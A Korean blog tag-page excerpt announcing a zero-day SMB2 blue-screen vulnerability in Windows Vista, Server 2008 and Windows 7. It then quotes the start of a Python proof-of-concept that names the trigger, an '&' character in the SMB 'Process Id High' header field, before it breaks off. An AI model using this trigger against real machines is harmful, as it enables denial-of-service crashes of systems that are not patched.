[태그:] BSOD

Vista/2008/Windows 7 SMB2 BSOD 0Day

Vista / 2008 / Windows7 에서 SMB 2.0 에 대한 BSOD(Blue Screen Of Death) 취약점이 나왔네요. 어찌보면 크리티컬한 취약점이지만 그냥 그저 그러네요…. #!/usr/bin/python # When SMB2.0 recieve a '&' char in the 'Process Id High' SMB header field it dies with a # PAGE_FAULT_IN_NONPAGED_AREA from time import sleep from socket import * import sys if …